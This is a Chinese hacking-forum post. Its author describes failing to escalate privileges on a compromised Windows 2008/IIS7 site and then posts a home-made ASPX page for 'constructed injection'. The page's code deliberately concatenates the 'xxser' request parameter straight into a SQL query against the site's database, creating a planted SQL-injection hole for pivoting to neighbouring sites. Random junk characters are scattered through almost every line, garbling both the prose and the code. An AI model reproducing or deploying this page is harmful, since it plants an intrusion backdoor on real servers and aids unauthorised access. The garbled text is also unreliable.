昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。" S* S5 H( ?' _
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。0 Y+ R) O" L8 j6 X, k
代码量不多,自己写个拉倒了。烦死了。
0 p$ N X; x0 ]4 B8 F# p _" U- ?6 G3 T/ _8 A0 @
' ?, x' `4 I8 r5 ^8 O k<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">. x8 u( \' U5 n% w, C
<html xmlns="http://www.w3.org/1999/xhtml">, c* Z2 e8 l, U, A& A+ C
<head runat="server">/ N8 X ?' M3 o% ]% v( O& J
<title>暗影aspx构造注射专用页面</title>, c+ i% y- e- s& N3 t
</head>5 n5 Q, O) b9 ?$ Z5 Y$ Z6 W
<body>6 ]4 |/ C9 e+ H( p
<form id="form1" runat="server">: q F1 q& P0 d. u- ?
<div>
2 S2 ]3 O+ |# A# j1 T; L <script language="c#" runat="server">
) U$ v; @" j+ A7 ?: C z* _- ] 2 T0 c0 Q& B( Q4 A0 N) @4 I/ L
void page_init(object sender, EventArgs e)
, _6 h+ z, h( w8 o {
" D2 k5 ~5 g _: u2 c 2 w' b8 i0 i. L
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();9 b2 D" C- i& d: ? g; s; g, H4 \
2 \) o* D1 f6 @6 G conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
5 A" F7 {, i3 g) l conn.Open(); u& D# R" f, K* B& y9 \- d: {
9 p+ z/ \' j7 I! T9 z
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1* I1 ^/ C6 ^8 ~7 ]! z6 Z8 H- n
8 }; @7 E$ ]5 }5 J2 [ System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
) j t8 Q4 [3 P3 d: j int x = command.ExecuteNonQuery();! F. d+ F0 h. u) N2 d
Response.Write(i+"\n");
- E5 y8 P' Q5 e" t: K8 u Response.Write(x);
' s5 \8 J3 I6 ~% f( K5 a conn.Close();* S N0 J. o6 k" O' [, n
}
6 J$ n' V5 u8 w3 z: K% P* J 0 `0 w3 S4 Y; h- `$ O6 J
</script>
- j( @+ P$ {2 V) J/ J </div>2 z! U+ @- C: k' x- y/ q; J
</form>+ Q2 i5 V; ?; k5 j+ C* d5 H+ R
</body>
1 \. Q1 h1 Z: ] O</html>
2 U! U$ D2 d, ^5 i1 }8 C |